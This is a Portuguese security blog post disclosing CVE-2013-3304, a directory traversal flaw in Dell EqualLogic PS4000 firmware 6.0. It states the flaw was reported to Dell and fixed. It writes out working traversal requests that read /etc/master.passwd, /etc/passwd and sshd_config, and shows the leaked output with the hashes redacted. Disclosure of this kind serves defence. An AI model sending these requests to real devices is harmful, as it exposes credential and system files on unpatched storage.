CVE-2013-3304 Dell EqualLogic Directory Traversal

cve-2013-3304-dell-equalogic-directory-traversal-blog-post-xlabs

A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informações da Dell esta falha foi consertada em uma nova versão de firmware.

Descrição da plataforma segundo o fabricante

Produtos EqualLogic são sistemas baseados em iSCSI Storage Area Network (SAN) comercializados pela Dell.

Interface web do Storage

dell-equallogic-index

A falha de segurança

# Software: Dell EqualLogic
# Versão: 6.0
# Empresa: Dell Computers
# Website: www.dell.com
# Vulnerabilidade: Directory Traversal
# CVE: CVE-2013-3304
# Autor: Mauricio Corrêa

## Informações Adicionais ##
Modelo do Equipamento Testado: Dell EqualLogic PS4000
http://www.dell.com/br/empresa/p/equallogic-ps4000e/pd
Firmware Version: 6.0
#########################################################################

O usuário malicioso envia requisições mal formadas para acessar arquivos sensíveis dentro do sistema operacional do Hardware, possibilitando a quebra da segurança do NAS Storage.

GET //../../../../../../../../etc/master.passwd

root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin

GET //../../../../../../../../etc/passwd

root:*:[hash]:Charlie &:/root:/bin/sh
daemon:*:[hash]:The devil himself:/:/sbin/nologin
operator:*:[hash]:System &:/usr/guest/operator:/sbin/nologin
bin:*::Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*[hash]:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:*:[hash]Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:*:[hash]0:Group Authenication Account:/:/sbin/nologin

Como foi possível perceber, a falha é grave porém não é crítica, ainda não sabemos a extensão da falha pois o escopo foi limitado nestes testes, nota-se que arquivos de configurações de todo o sistema podem ser lidos.

Directory_TraversalJPG2

O sistema em si trata-se de um NetBSD podendo ser constatado lendo o arquivo de configuração do SSHD:

GET //../../../../../../../../etc/ssh/sshd_config HTTP/1.1

# $NetBSD: sshd_config,v 1.16 2002/10/01 14:07:47 itojun Exp $

A falha foi corrigida na nova versão dos firmwares da linha EqualLogic da Dell.

Gostou do artigo? Compartilhe.

LinkedIn
Facebook
WhatsApp

Faça parte da nossa lista de emails!